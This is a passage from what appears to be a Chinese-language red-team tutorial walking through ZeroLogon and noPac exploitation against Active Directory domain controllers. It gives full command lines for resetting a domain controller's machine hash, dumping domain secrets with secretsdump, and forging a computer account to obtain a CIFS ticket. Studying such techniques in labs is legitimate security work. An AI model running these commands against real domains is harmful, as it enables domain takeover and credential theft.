Skip to main content

历史漏洞的利用

CVE-2020-1472 ZeroLogon漏洞

因为脆弱的密码学设计,攻击者可以绕过认证并模仿任何域主机,包括域控制器,以实现提权。这里我们使用来自 https://github.com/leitosama/SharpZeroLogon 的 exp。在之前的章节中,我们使用该工具的检测模式检测出了 dc01 受该漏洞影响。我们再来回顾一下:

在域内环境的话,我们只需要指定域控制器即可,发现该域控可被 zerologon 漏洞的攻击所接管。

image.png

增加 -reset 选项,来重置 dc01 主机的凭证:

image.png

这时,dc01 主机的哈希被重置为显示出的指定 NTLM。得到了 dc01 主机的新哈希后,我们可以使用 CobaltStrike 内置的 PTH 命令。但是该命令需要当前主机的提升特权,而且因为会补丁 lsass.exe,一方面是特征较为显著,另一方面是会被 RunAsPPL 所阻止 (我们会在下一章节详细讲解 PTH 以及 RunAsPPL) 。

image.png

image.png

我们可以使用 Impacket 中的 secretdump 脚本来实现:

proxychains secretsdump.py  -dc-ip 172.16.1.11 -just-dc -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'dc01$'@prod.raven-med.local

image.png


CVE-2021-42278 NoPAC漏洞

该漏洞实际上利用了主机账号的伪造,攻击者可以从普通用户提升为域管理员。这里,我们使用来自 https://github.com/Ridter/noPac 的exp。

指定明文帐号密码,以及域名,用扫描模式检测一下漏洞的存在

image.png

接下来,我们需要利用这个漏洞创建一个新的计算机帐号,指定计算机名密码服务类型。该工具集成了 Rubeus 中 S4U 的功能,因此能生成一张 Dc05$ 的 TGT 并将其转换为 CIFS 的 TGS

nopac.exe -domain white-bird.local -user serveradm -pass "Summer2024!" /dc dc05.white-bird.local /mAccount nopac /mPassword Passw0rd /service cifs /ptt

image.png

于是,我们可以访问 dc05 的资源了。

image.png